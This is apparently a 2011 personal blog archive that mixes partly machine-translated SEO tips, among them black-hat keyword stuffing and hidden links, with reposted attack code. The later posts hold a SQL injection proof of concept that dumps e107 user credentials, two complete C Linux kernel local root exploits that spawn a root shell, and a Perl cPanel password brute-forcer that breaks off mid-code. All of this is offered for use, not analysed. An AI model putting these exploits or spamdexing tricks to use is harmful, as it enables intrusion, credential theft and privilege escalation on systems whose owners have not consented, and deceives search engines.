Monday, October 31, 2011

Black Hat SEO


With the use of Black Hat SEO techniques, a site visitor can jump high.effective way, but not unethical.The main thing for those of you who have a website or blog is a lot of visitors visit the site / blog.when visitors crowded visiting your site / blog so your site / blog you become famous, whichmeans that the easier it gets iklan.mayoritas internet users get the address of the site / blogthrough search engines like: google, yahoo.maka get the top on search engines is paramount.
because it is known the term Search Engine Optimization (SEO), SEO is basically a techniquean algorithm for placing a site / blog diurutan top of the search results on search enginesaimed at making a lot of visitors, many from his way of doing metatags to add contentuniquely into a site / blog.
SEO is also known as Spamdexing, use of this technique is unethical because the use ofThis technique simply just chasing a high score in search engines, but not necessarily site / blogpresent information according to keywords.risks of using this technique is a site / blog will be banned by search engines.
Key StuffingStuffing is a key technique to flood a web page with the important words that are sought after bysearch engine users, the word is made in such a way that does not interfere with penungunjungin visiting the site / bloga it.There are several ways the use of this technique ... ....
1.invisible keyword.This technique most frequently used and most easily.this technique to disguise the color of keywords (keywords), so that it becomes identical tothe color of your site / blog tersebut.search engines do not see a site / blog based on the shape visulnyabut a reading of the Source Code (HTML code), then place as one ofthe search results.
2.invisibel linkis similar but not identical techniques of invisible keyword techniques, this technique dilakakukan withshew hyperlinks on each character period (.) our site / blog.

Posted by itok at 8:34 PM 1 comments
Labels:

Attach Meta Tags on Blogger

Meta tags are an important way of delivering information to search engines (Search Engine) on the information of a page, There are many meta tag in accordance with the HTML 4.0 standard from the World Wide Web Consortion, but really truly used by the search engines only 3, description, keywords , and robots. Explanations about meta tags because it was too much to write this so I choose aja derived from this address http://darmananda.blogspot.com (all the explanation there is no editing as original)
Meta Description TagMeta description tag is used to provide a general overview of the contents of your web page. The size is recommended no more than 200 characters. And see to it that this description can besentences which were located at the beginning of the relevant page of web pages. Example meta tag description is as follows:

Some search engines like Northern Light and Google does not use meta tags as a description of its search results. They use is the beginning of sentences that exist on the page.That is why I recommend that you use the content of meta description tag as the opening sentence. And if the very beginning of your web in the form of a menu, then the description ofdisplayed on the search results Northern Light is like this:Home | Products and Service | Contact Us | About Us ... welcome to our online store, the best place on the web to ...
Meta Keyword TagMeta tag keywords is very important because determining what keywords to find the web page on search engines. Basic syntax of the meta tag keywords isas follows:
or some are written with comma separators:Both serve the same and have no bearing on the search engines.The purpose of the comma that these keywords are easier to read. To note here is do notrepeat a word more than 3 times, because it will be considered spamming. Examples of using the wrong keywords meta tag is:
Here we can see all that the word "bali", repeated more than 3 times. The following example will not be considered spamming by search engines:
Equally important is the keyword is not to make the keywords that have nothing to do with the content of your web page. It also will be considered spamming. Suppose your webcontains information on tourism in Bali, do not ever add "MP3" or "Britney Spears" as a keyword keywords just because this is a favorite keyword on the internet andmuch sought-after.
Meta Robots TagThe main objective is to use robots meta tag to specify which web pages can be indexed by a spider and web pages which are not. This tag is very useful especially if thing elsewebsite uses frames for navigation. Obviously we do not want to display the menus in the frame to be read by search engines.Basic format of the meta robots tag is as follows:For example, if you want the spiders to read the main page, and browse through all the links that exist then add the following command:
With this command will spider to index your main page and schedule to index the other pages that can be searched via a hyperlink ().The following command will instruct the spider not to index and browse the links on a web page.
Then how to put Meta Tags on Blogger:To install Meta tag diBlogger quite easy, first go to Edit HTML and then copy and paste the code below, usually code meta tags are placed under the code <data:blog.pageTitle/> </ title> and do not forget to change the color code red </span><span title="di bawah sesuai dengan deskripsi blog kamu.">below in accordance with the description of your blog.<br><br></span><span title="<meta content=' Tulis deskirpsi disini' name='description'/>"><meta content=' Write deskirpsi disini' name='description'/><br></span><span title="<meta content='keyword1 keyword2 keyword3 ...'"><Meta content = 'KEYWORD1 KEYWORD2 keyword3 ...' </span><span title="name='keywords'/>">name = 'keywords' /><br></span><span title="<meta content='INDEX, FOLLOW' name='ROBOTS'/>"><meta content='INDEX, FOLLOW' name='ROBOTS'/><br><br></span><span title="Selama Mencoba, Happy Blogging">During Testing, Happy Blogging</span></b></span></p>
Posted by itok at 8:19 PM 0 comments
Labels:

SEO ++ Again


SEO stands for Search Engine Optimization, which means doing website optimization in order to be displayed on the main page / page up on search engines when someone types a word search on the search engine box.
For example, if someone opens the search engines Google or Yahoo and type in the word selanjutnnya he will search in the box and then search engines will display a page that contains the list of websites that match the search words you entered person.
Below are some ways to get high rankings in search engines:
1. Titles and URLsTitles and URLs is not only important to keep the ads that appear are always relevant to your site, but also affect your ranking in search engines.
example:- A page containing about car repairs were named "mobil.html" will probably get a low ranking when someone searches for information about car repair. Change the page name with "reparasi_mobil.html" and you will get a high ranking for someone looking for a car repair content, because according to the content on your website.
- The first URL www.domain.com / page better than the second URL http://domain.com/page.php?newsid=1234583373. Why?Since the first URL is easier to read by robots.txt (one engine working system) compared with the second URL.
2. Publish your site linkYou can do this in various ways, can by following the forum and put your link on every post, can exchange links, or can also register your blog to various community associations bloggers / sites.
For example a blog that I have listed in my www.kordgitarrequest.blogspot.com www.kumpulblogger.com and www.rumahblogger.com for publication are not directly and find out your site / blog anything that has a high ranking there, and could follow the ways they achieve a high ranking on search engines.

3. Register your site on search engines Google and Yahoo are the most importantGoogle http://www.google.com/addurlYahoo http://search.yahoo.com/info/submit.html
As Chart MTV Powerful is always up and down, so does the search engine, so once you register your site on search engines, you should concentrate more on content / content of your website, be it updates, quality, and others that will make you continue to rank rises and reaches the highest level.
May be useful.

Posted by itok at 8:15 PM 1 comments
Labels:

Drive the Search Engine to Your Website

Congratulations if your website is indexed in search engines!Maybe you've done manually submit (submit mailing list search engine manually), or have made use of free services like http://www.submitexpress.com/ submitter.
However, websites that have been indexed in search engines is not enough. You have to try harder so your web pages can be indexed as much as possible and each get a good position in search engine result pages.
There is a good technique (and of course free) which can be utilized to memgoptimalkan performance of your website. This technique is a technique popular search engines lead to your web pages. Yes, do not wait too long to make search engines kindly browse your web pages. Now it's time you was the one who handed me a list of tasks to the search engines.
As a bonus, this technique also be a powerful trick if your website has not been indexed in Google, less than a week guaranteed your website will be indexed!File Types List of URLs
First, always know the types of files you have handed to the search engines:
*sitemap.xml (and file compression sitemap.xml.gz): files list of URLs which you later handed to the search engine Google.*urllist.txt (and file compression urllist.txt.gz): URL file list to lead the search engine Yahoo!.*ror.xml: file a list of URLs to be exchanged via syndication / RSS feed.*sitemap.html: files list the URL for you serve to your visitors and reserve for other search engines.
Create List of URLs
Second, prepare a list of URL file all your web pages. No need to panic if you do not know how to create an XML file, do not despair if you have hundreds of web pages which should be recorded. You can utilize the tool maker files mentioned above.You can try the URL list file creation services online such http://www.xml-sitemaps.com/, or install the software for this purpose, for example GSiteCrawler (http://gsitecrawler.com/).Upload a list of URLs to Web Hosting
Third, after some file formats have a list of URLs you have, now completely uploaded to the web hosting. Put those files into the main directory (example in public_html). These files which was later referred to the bot will first search engine during a visit to your website (in accordance with the format of the file).Thrusts list of URLs to Search Engines
The last stage, specifically in the search engine Google, you can be more aggressive in offering a list of URLs (sitemap.xml). You do this by utilizing the Google Webmaster Tools service. Log in to the service using your Gmail account ID. Fill in the data of your website, verify the website as exemplified in there, and then submit sitemap.xml file that you currently have. Do not forget, use features of Webmaster Tools are there to monitor the performance of your website.
With similar technical, you can also handed a list of URLs (sitemap.xml) to MSN Live Webmaster Tools
Posted by itok at 8:06 PM 0 comments
Labels:

Setting Custom Domain In blogspot


Having a blog with a domain name top level domain (no-frills blogspot, wordpress, multiply, etc.) will certainly make our blog look more elite and classy, ​​and will also make the name of our blog will be more easily remembered. If you do not have a domain, you can afford to buy a paid domain. If we have to buy the domain then there are some things we must do our domain so fixed on the web / blogs that we have, among which the DNS settings, etc. Name Server. Let us start the steps to customize this domain.* SETTING DNS (DOMAIN NAME SERVER)The initial steps we are setting up DNS. Usually when we buy a domain will be no additional cost (about IDR 3000, -) to add the service "Managed DNS". But if you do not want to pay there is a free service so that we can perform DNS settings, such as in dnspark.net. Well here is a tutorial if you use the services of this DNSPark:
1. If you do not already have an account on DNSPark miles can list https://www.dnspark.net/register.2. If you have registered please login.3. Select the menu "DNS Hosting" (on the left). Then select "Add Domains"4.Beri tick box "DNS Hosting - Free" then Enter the domain name you've bought in the "Enter new domain" (without the www).5. Then click the "Add Now"6. If successful then domainmu name will appear in the "Domain List" (lower left corner)7. Click the domain mile to make further arrangements.8. In the Dropdown "Type" select "CNAME".9. In the column "Alias ​​Name" fill in the www (actually anything that can be filled, tp utam should be filled for the domain "www").10. Then to fill in the destination name ghs.google.com (to blogspot).11. If you have click the "Update All"For the process of setting up DNS is complete.
* SETTING IN PUBLISHING BLOGGERNha is now living the last step. gini steps:
1. Log in blogger. Select the menu "Settings -> Publishing"2. Then click the link Switch to: Custom Domain3. Then click again the link Already own a domain? Switch to advanced settings4. Then fill your blog name in the "Your Domain" (pake www yes, the example www.kangnoval.com)5. Then click the "Save Settings"
Yak's all finished. If all the settings were done correctly then your new domain will be active approximately 1-24 hours even nyampe 48 hours .. So the patient wrote

Posted by itok at 8:03 PM 0 comments
Labels:

Learning SEO is it necessary?

Learning SEO is fun, but also confusing, need to learn what it's Pagerank, SEO Black, White SEO, link, follow, dofollow, URL, choose keywords, and web design SEO Friendly. Why so complicated & headache? Whereas the purpose of SEO is to increase the visitors on our website right? Is there any way other than SEO? There really, no less powerful way to SEO, what is it?
SEO (Search Engine Optimization) is an attempt to increase traffic from Search Engines (Google, Yahoo, MSN, and friends).SEO aims to our website is ranked high when people type in keywords in the Search Engines.
Building the Visitor Loyalty
Visitors who come to our website, will come again at another time, if in his heart said "the website is good for me" or "this website that I need". To attract visitors to come at another time there tips as follows from Mas Cosa Aranda:
* Provide content that is informative, up-to-date, quality and originality.* Provide something unique and not found on other sites.* Building interactions with visitors.
Content (content) quality
This is a key element of building a community-based web visitors. What if we sell the product Web site? Electronics stores for example? We can see examples of websites Innovative Electronics Surabaya. The website has not been optimized in SEO, including:
* Wesbite is based on frame, which complicate the spiders / crawlers.* The links in the menu using the pictures.* No ALT and TITLE attributes on links and images* All pages have the same title is the name of the store or company.
Although not optimized by SEO, judging from the traffic in Alexa, the current web ranking Innovative Electronics is not much different from tutorialgratis.wordpress.com this blog, so I expect my web visitors Innovative Electronics is the hundreds per day.Electronic Innovative Web also has a Pagerank = 4.
Pagerank (PR) is an important measure of whether or not a web page created by Google. The more other web pages that link to that page, the PageRank will be higher. Google combines a number of links and quality content to sort your web rankings in search engines. The lowest PR is 0 and the highest is 10.
At this writing, tutorialgratis.wordpress.com blog is still new, but already has about 1500 unique page views per day, unique visitors to 700-1000 per day, and Pagerank (PR) = 5. Thanks to the loyal visitors who have opened this blog, comments, suggestions, and criticism I am waiting for. Many bloggers seniors who visit. Thank you once again I say to you, the visitor tutorialgratis.wordpress.com blog.
Return to the Innovative Electronics web problems, whether the excess of the content of this web?
* Each product is described in detail, not just images.* Many articles, applications, and newsletter.* More than 500 indexed pages of Google and Yahoo.
Innovative Electronics web Why have Pagerank (PR) = 4? Did a lot of pages that link to the website?
Apparently not!
Please enter link: http://www.innovativeelectronics.com/ on Google, it turns out there is only one page that links to the website. Namely a free blog at blogspot that has a PR = 0.Continue from where PR was obtained? Have any ideas please comment yes
Comments, DoFollow or NOFOLLOW?
Nofollow is an HTML code which instructs the search engines do not consider these links in calculating the ranking of web pages.Without nofollow attribute, a link is DoFollow and can increase the page ranking of the intended link.
Blog or web with nofollow links are good comment on the view from the side of SEO, but today many people are looking for backlinks and prefer comments with dofollow attribute. This causes a dofollow blog with comment link many people commented. Nevertheless, the majority of Internet users do not notice a link is nofollow or dofollow. Usually the visitors who commented in your blog / website is being attracted by its contents.
Facilities & subscribe to the feed via email
Feed is a facility used by visitors to find content (content) is updated. Examples of feeds from this blog: http://tutorialgratis.wordpress.com/feed/
Feed can be optimized by registering on FeedBurner or FeedBlitz. Two of these services also provide the facility to subscribe by email (newsletters). For example, you can subscribe via email the articles in this blog by clicking on the link to subscribe via email. A confirmation email will be sent after you fill out the form. You can unsubscribe at any time, because there unsubscribe link at the bottom of each article that is sent via email.
By providing an email subscription service, meaning you can build a loyal community or visitors to your blog.
Running SEO and Build Community, not good?
If the two techniques are executed simultaneously, the result will be very satisfactory. See blogs CosaAranda.com applying SEO techniques (you can see the link on the page that crowded), could also be tested by inserting the word link: http://cosaaranda.com on Google. Blog Cosa Aranda is also building a community with dofollow links in comments, providing subscription email services (number of subscribers: THOUSANDS), and the content / contents of the original.
Conclusion
Learning SEO is good, but the most important in building a web community / blog and increase visitors to your web / blog you in the long run is the quality of content / the content of the web.
Posted by itok at 7:59 PM 0 comments
Labels:

Effectively searches on Google

You used to do a search through Google's search engine simply by engineering the input word / phrase and click Search! Did you know Google provides a variety of search techniques to obtain optimal results. Here are some techniques typing search phrase on Google and the benefits you can get:
*define: term: to find a list of the meaning or definition of a term.For example type in define: blog to find definitions of blogs.*n1 + n2: to perform arithmetic operations, n is the numerical value calculation. Use + for addition, - for subtraction, * for multiplication, / for division, ^ for reappointment, and so on (check the complete list of operators in http://www.google.co...calculator.html). You also can perform complex calculations, such as type 2 * 100 / 4, then Google will display 50 as a result.*frase_search filetype: ext: to limit the search results only on the associated file type. For example typing tutorial presentation filetype: pdf to find the tutorial presentations in PDF file format.Try to repeat the search with other file extensions to see the difference (eg xls or doc).*n currency1 in currency2: to convert the currency exchange rate. Eg type 10 USD in EUR or 10 U.S. $ in the rupiah exchange rate to calculate the value of U.S. $ 10 (USD) in Rupiah (IDR).*books theme of the book: to find the link sites that present information related to the theme of the book. For example type in books how to assemble a pc to get info on how to assemble pc book.*movie: frase_search: to search for movie reviews. For example type in movie: love, it will display a list of film reviews entitled or associated with love (actors, locations, and so on).*site: site.com: to display the entire list of web pages a site indexed by Google. For example type in site: smitdev.com to see a list of web pages smitdev.*link: site.com: to check the list of sites that refer links to sites searched. For example type in link: smitdev.blogspot.com to see a list of sites that refer to the blog SmitDev.
Posted by itok at 7:57 PM 0 comments
Labels:

How To Make Money With The Keyword List

Allright peopel, a nie SEO article this time : Make Money With AdSense and This Keyword List? Hardly.

Sure. Everyone who is looking here knows what AdSense does. It pays publishers for clicks on placed sponsored ads. You put a bunch of ads on your page and then rush to the bank to count your money, right? AdSense is the magic wand money maker.

Well, people, that isn't the case. AdSense isn't going to make you any money by itself. What is going to earn you money is traffic. In order to make any money, you need to have a good, quality web site that generates visitors. That is the rule of the net and it is no different with AdSense. Without traffic, you are doomed to make 5 cents a month.

Make Money Through Traffic

I am not talking about fake traffic either. Traffic Swarm and the rest of the robotic, automatic page rotators and surfers aren't going to get customers clicking through your website. Most people let those auto surf programs run while they go to sleep. There isn't anyone there to click anything. There is also the small problem that those things a re against Google's TOS (Terms of Service), and they will probably kick you out if they catch you. (My secret opinion is that if you get banned from AdSense, you will probably get a penalty in the Google Index too. That's double pain for your cheating, efforts. I you won't even generate a click. That's not good business at all.)

So, if you want your AdSense projects to generate extra money, you are going to have to go through the same process as everyone else trying to make it online. There are 5 things that you have to do to get noticed by search engines:

1) You have to update your site daily.
2) You have to submit your site to listings, directories and search engines.
3) You have to visit forums and blogs and post the night away.
4) You have to accumulate backlinks to your site.
5) And mostly, you have to write some good, sticky content. (What good is it to get 5 new visitors to your site if they don't come back?)

If you don't have the time to do some hard work, you might as well do something else. How about pet care? That isn't too mentally taxing. Selling Avon or something might be more for you. The truth is that there are no successful websites online that don't have hundreds (if not thousands) of man/woman hours behind them. Even getting a mere 5 new visitors a day is a major success in the beginning. (I can remember being excited that 15 unique visitors were on my first website. People I didn't pay to be there. Not customers, just visitors. Today, if I only got 15 orders in any particular day, I would go into a major panic.) The only way to make it is to pay your dues.

So How Do I make Money With The List? :)

Well, if you want to make money with the list alone, you have to find a bunch of suckers, tell them that they will be rich if they give you 13 dollars to buy it and then sell it to them. That's how you use the list for best results.

The only problem is that someone will get angry and post it online and the game is up. Does that mean it is useless. Well, it isn't worth $13, but it is still worth looking at in detail.

Tomorrow, I will tell you in detail how to take some of the terms, but not "Yahoo Domains," in the list and adapt them into your website. It is as obvious and easy as saying, "expensive, luxury cars" and "hybrid performance vehicles" 5 times really fast. Dealers welcome, sale, sale, sale...Free!!
Posted by itok at 7:52 PM 0 comments
Labels:

e107 v7 CMS plugin - SQL Injection vulnerability 


# Exploit Title: jbShop - e107 v7 CMS plugin - SQL Injection vulnerability
# Author: Robert Cooper (admin[at]websiteauditing.org)
# Software Link: http://sourceforge.net/projects/jbshop/
# Tested on: [Linux/Windows 7]
#Vulnerable Parameter:
  
item_id=
 
  
##############################################################
PoC:
  
http://www.example.com//plugins/jbshop/jbshop.php?item_details=1&item_id=-1 union all select group_concat(user_loginname,0x3a,user_password,0x3a,user_admin),2,3,4,5,6,7,8,9,10,11,12,13,14 FROM e107_user--
 
  
##############################################################
www.websiteauditing.org
www.areyousecure.net
  
# Shouts to the Belegit crew


# 1337day.com
Posted by itok at 1:02 PM 0 comments
Labels:

Linux 2.6.3* x86_64 2010 local root exploit 


/*
 *
 * 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
 * 0     _                   __           __       __                     1
 * 1   /' \            __  /'__`\        /\ \__  /'__`\                   0
 * 0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
 * 1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
 * 0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
 * 1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
 * 0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
 * 1                  \ \____/ >> Exploit database separated by exploit   0
 * 0                   \/___/          type (local, remote, DoS, etc.)    1
 * 1                                                                      0
 * 0  By CrosS                                                            1
 * 1                                                                      0 
 * 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1
 *
 *
 * Tested on Linux 2.6.32.1 | Linux 2.6.33.2 | 2.6.32-24-generic | 2.6.37 (2010)
 * Result;
 * # id
 * uid=0(root) gid=0(root)
 *
 * 3xPl017 F0r x86_64 L1nuX k3rn3L ia32syscall 3muLatL47i0N (again) > x86_64 2.6.27+ ( not for 2.6.27 and below ! )
 *
 * If y0u g37 3Rr0R > ./1337
 * symbol table not available, aborting!
 * Process finished < O_o
 * C4usE 3xpl017 Re4dS "/proc/kallsyms" | "/proc/ksyms" , iF n07 4va1bl3! iT g1ve5 ErRoR O_o
 *
 * Upgrade the kernel ksplice without Reboo7, and the vulneRabiLitY is gonE !
 * 
 * Greetz: r0073r(1337day.com) ,r4dc0re ,Sid3^effects | & all members of r00tw0rm.com !
 */
 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 

typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;

int kernelmodecode(void *file, void *vma)
{
 commit_creds(prepare_kernel_cred(0));
 return -1;
}

unsigned long
get_symbol(char *name)
{
 FILE *f;
 unsigned long addr;
 char dummy;
 char sname[512];
 int ret = 0, oldstyle = 0;

 f = fopen("/proc/kallsyms", "r");
 if (f == NULL) {
  f = fopen("/proc/ksyms", "r");
  if (f == NULL)
   return 0;
  oldstyle = 1;
 }

 while (ret != EOF) {
  if (!oldstyle) {
   ret = fscanf(f, "%p %c %s\n", (void **) &addr, &dummy, sname);
  } else {
   ret = fscanf(f, "%p %s\n", (void **) &addr, sname);
   if (ret == 2) {
    char *p;
    if (strstr(sname, "_O/") || strstr(sname, "_S.")) {
     continue;
    }
    p = strrchr(sname, '_');
    if (p > ((char *) sname + 5) && !strncmp(p - 3, "smp", 3)) {
     p = p - 4;
     while (p > (char *)sname && *(p - 1) == '_') {
      p--;
     }
     *p = '\0';
    }
   }
  }
  if (ret == 0) {
   fscanf(f, "%s\n", sname);
   continue;
  }
  if (!strcmp(name, sname)) {
   printf("ReS0lvEd sYmBoL %s 7o %p\n", name, (void *) addr);
   fclose(f);
   return addr;
  }
 }
 fclose(f);

 return 0;
}

 
static void docall(uint64_t *ptr, uint64_t size)
{
 commit_creds = (_commit_creds) get_symbol("commit_creds");
 if (!commit_creds) {
  printf("sYmb0l 74bl3 no7 ava1labLe, ab0r71n9! Fuck off\n");
  exit(1);
 }

 prepare_kernel_cred = (_prepare_kernel_cred) get_symbol("prepare_kernel_cred");
 if (!prepare_kernel_cred) {
  printf("sYmb0l 74bl3 no7 ava1labLe, ab0r71n9! Fuck off\n");
  exit(1);
 }

        uint64_t tmp = ((uint64_t)ptr & ~0x00000000000FFF);

 printf("MaPpiNg at %lx\n", tmp); 

        if (mmap((void*)tmp, size, PROT_READ|PROT_WRITE|PROT_EXEC,
                MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) == MAP_FAILED) {
                printf("mMap faUl7\n");
                exit(1);
        }
 
        for (; (uint64_t) ptr < (tmp + size); ptr++)
                *ptr = (uint64_t)kernelmodecode;
 
        __asm__("\n"
        "\tmovq $0x101, %rax\n"
        "\tint $0x80\n");
 
        printf("UID %d, EUID:%d GID:%d, EGID:%d\n", getuid(), geteuid(), getgid(), getegid());
        execl("/bin/sh", "bin/sh", NULL);
        printf("no /bin/sh ??fuck\n");
        exit(0);
}
 
int main(int argc, char **argv)
{
        int pid, status, set = 0;
        uint64_t rax;
        uint64_t kern_s = 0xffffffff80000000;
        uint64_t kern_e = 0xffffffff84000000;
        uint64_t off = 0x0000000800000101 * 8;
 
        if (argc == 4) {
                docall((uint64_t*)(kern_s + off), kern_e - kern_s);
                exit(0);
        }
 
        if ((pid = fork()) == 0) {
                ptrace(PTRACE_TRACEME, 0, 0, 0);
                execl(argv[0], argv[0], "2", "3", "4", NULL);
                perror("exec fault");
                exit(1);
        }
 
        if (pid == -1) {
                printf("foRk FaUlt(\n");
                exit(1);
        }
 
        for (;;) {
                if (wait(&status) != pid)
                        continue;
 
                if (WIFEXITED(status)) {
                        printf("Pr0ces5 fiNisHeD\n");
                        break;
                }
 
                if (!WIFSTOPPED(status))
                        continue;
 
                if (WSTOPSIG(status) != SIGTRAP) {
                        printf("ProCess rec3iveD si9naL: %d\n", WSTOPSIG(status));
                        break;
                }
 
                rax = ptrace(PTRACE_PEEKUSER, pid, 8*ORIG_RAX, 0);
                if (rax == 0x000000000101) {
                        if (ptrace(PTRACE_POKEUSER, pid, 8*ORIG_RAX, off/8) == -1) {
                                printf("PTRACE_POKEUSER fault\n");
                                exit(1);
                        }
                        set = 1;
                 //rax = ptrace(PTRACE_PEEKUSER, pid, 8*ORIG_RAX, 0);
                }
 
                if ((rax == 11) && set) {
                        ptrace(PTRACE_DETACH, pid, 0, 0);
                        for(;;)
                                sleep(10000);
                }
 
                if (ptrace(PTRACE_SYSCALL, pid, 1, 0) == -1) {
                        printf("PTRACE_SYSCALL fault\n");
                        exit(1);
                }
        }
 
        return 0;
}


# 1337day.com
Posted by itok at 12:58 PM 0 comments
Labels:

Linux Kernel 2.6.13 Local root Exploit 


/*
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm Angel Injection member from Inj3ct0r Team          1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

#####################################################
# Title: Linux Kernel 2.6.13 Local root Exploit     #
# Author: Angel Injection                           #
# Home: http://1337day.com                          #
# Thanks To: Inj3ct0r Team                          #
#####################################################
**
*/

#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 


static struct exec ex;
static char *e[256];
static char *a[4];
static char b[512];
static char t[256];
static volatile int *c;


/*              shell code  */
__asm__ (" __excode: call 1f   \n"
  " 1:  mov $23, %eax  \n"
  "   xor %ebx, %ebx  \n"
  "   int $0x80   \n"
  "   pop %eax   \n"
  "   mov $cmd-1b, %ebx  \n"
  "   add %eax, %ebx  \n"
  "   mov $arg-1b, %ecx  \n"
  "   add %eax, %ecx  \n"
  "   mov %ebx, (%ecx)  \n"
  "   mov %ecx, %edx  \n"
  "   add $4, %edx  \n"
  "   mov $11, %eax  \n"
  "   int $0x80   \n"
  "   mov $1, %eax  \n"
  "   int $0x80   \n"
  " arg:  .quad 0x00, 0x00  \n"
  " cmd:  .string  \"/bin/sh\" \n"
  " __excode_e: nop    \n"
  " .global  __excode   \n"
  " .global  __excode_e   \n"
 );



extern void (*__excode) (void);
extern void (*__excode_e) (void);


void
error (char *err)
{
  perror (err);
  fflush (stderr);
  exit (1);
}


/* exploit this shit */
void
exploit (char *file)
{
  int i, fd;
  void *p;
  struct stat st;

  printf ("\ntrying to exploit %s\n\n", file);
  fflush (stdout);
  chmod ("/proc/self/environ", 04755);
  c = mmap (0, 4096, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS, 0, 0);
  memset ((void *) c, 0, 4096);

  /*      slow down machine       */
  fd = open (file, O_RDONLY);
  fstat (fd, &st);
  p =
    (void *) mmap (0, st.st_size, PROT_READ | PROT_WRITE, MAP_PRIVATE, fd, 0);
  if (p == MAP_FAILED)
    error ("mmap");
  prctl (PR_SET_DUMPABLE, 0, 0, 0, 0);
  sprintf (t, "/proc/%d/environ", getpid ());
  sched_yield ();
  execve (NULL, a, e);
  madvise (0, 0, MADV_WILLNEED);
  i = fork ();

  /*      give it a try           */
  if (i)
    {      
      (*c)++;
      !madvise (p, st.st_size, MADV_WILLNEED) ? : error ("madvise");
      prctl (PR_SET_DUMPABLE, 1, 0, 0, 0);
      sched_yield (); 
    }
  else
    {
     nice(10);
     while (!(*c));
  sched_yield ();
      execve (t, a, e);
      error ("failed");
    }

  waitpid (i, NULL, 0);
  exit (0);
}


int
main (int ac, char **av)
{
  int i, j, k, s;
  char *p;

  memset (e, 0, sizeof (e));
  memset (a, 0, sizeof (a));
  a[0] = strdup (av[0]);
  a[1] = strdup (av[0]);
  a[2] = strdup (av[1]);

  if (ac < 2)
    error ("usage: binary ");
  if (ac > 2)
    exploit (av[2]);
  printf ("\npreparing");
  fflush (stdout);

  /*      make setuid a.out       */
  memset (&ex, 0, sizeof (ex));
  N_SET_MAGIC (ex, NMAGIC);
  N_SET_MACHTYPE (ex, M_386);
  s = ((unsigned) &__excode_e) - (unsigned) &__excode;
  ex.a_text = s;
  ex.a_syms = -(s + sizeof (ex));

  memset (b, 0, sizeof (b));
  memcpy (b, &ex, sizeof (ex));
  memcpy (b + sizeof (ex), &__excode, s);

  /*      make environment        */
  p = b;
  s += sizeof (ex);
  j = 0;
  for (i = k = 0; i < s; i++)
    {
      if (!p[i])
 {
   e[j++] = &p[k];
   k = i + 1;
 }
    }

  /*      reexec                  */
  getcwd (t, sizeof (t));
  strcat (t, "/");
  strcat (t, av[0]);
  execve (t, a, e);
  error ("execve");
  return 0;
}


# 1337day.com
Posted by itok at 12:57 PM 0 comments
Labels:

Friday, October 28, 2011

Tool untuk mempercepat Video Streaming ( Youtube ) Etc

Anda tentu sudah tidak asing lagi dengan Youtube, meteacafe atau situs video streaming lainnya yang sangat menyenangkan dan menarik untuk dikunjungi. Tapi saya yakin, pada saat koneksi internet sedang lambat atau memang anda mempunyai koneksi internet yang lambat maka kenyamanan untuk menonton video streaming sangat terganggu dengan hal yang namanya buffering. Untuk mengatasi hal tersebut, saya punya sebuah cara yang mungkin bisa membantu. Bywifi Video Accelerator bisa mempercepat bit-rate video streaming hingga 3-5 kali lebih cepat. Selain itu ada beberapa fungsi lain yang sangat membantu seperti "download" yang bisa digunakan untuk mendownload video dari beberapa situs video streaming yang didukung oleh Bywifi Video Accelerator. Click disini
Posted by itok at 10:18 AM 0 comments
Labels:

Thursday, October 27, 2011

Cpanel Password BruteForce Perl eXploit

#!/usr/bin/perl # Cpanel Password Brute Forcer # ---------------------------- # http://dl4hack.com # ---------------------------- use IO::Socket; use LWP::Simple; use MIME::Base64; $host = $ARGV[0]; $user = $ARGV[1]; $port = $ARGV[2]; $list = $ARGV[3]; $file = $ARGV[4]; $url = "http://".$host.":".$port; if(@ARGV < 3){ print q( ############################################################### # Cpanel Password Brute Force Tool # ############################################################### # usage : cpanel.pl [HOST] [User] [PORT][list] [File] # #-------------------------------------------------------------# # [Host] : victim Host (simorgh-ev.com) # # [User] : User Name (demo) # # [PORT] : Port of Cpanel (2082) # #[list] : File Of password list (list.txt) # # [File] : file for save password (password.txt) # # # ############################################################### # itok # ############################################################### );exit;} headx(); $numstart = "-1"; sub headx() { print q( ############################################################### # itok # ############################################################### ); open (PASSFILE, "<$list") || die "[-] Can't open the List of password file !"; @PASSWORDS = ; close PASSFILE; foreach my $P (@PASSWORDS) { chomp $P; $passwd 